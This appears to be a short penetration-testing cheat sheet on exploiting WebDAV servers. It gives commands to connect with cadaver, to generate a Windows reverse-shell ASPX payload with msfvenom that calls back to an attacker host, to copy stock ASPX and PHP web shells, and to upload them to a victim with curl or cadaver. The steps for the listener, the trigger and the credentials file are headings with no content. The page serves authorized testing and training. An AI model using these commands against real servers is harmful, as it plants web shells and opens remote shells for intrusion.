search
githubEdit

WebDAV

Port 80

hashtag
1) Connection

cadaver http://domain.local/webdav

hashtag
2) Exploitation

hashtag
1. Generate a reverse shell

Windows machine

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=80 -f aspx -o shell.aspx

OR use a webshell instead

cp /usr/share/webshells/aspx/cmdasp.aspx .

Linux machine

cp /usr/share/webshells/php/php-reverse-shell.php .

hashtag
2. Upload payload via WebDAV

curl -T 'shell.aspx' 'http://$VictimIP/' -u <username>:<password>

OR in Cadaver

put shell.aspx
put php-reverse-shell.php

hashtag
3. Start the listener

hashtag
4. Trigger the payload

hashtag
3) WebDAV credentials file location

PreviousVoice over IP Penetration TestingNextExtensible Messaging and Presence Protocol XMPP (Jabber) Penetration Testing

Last updated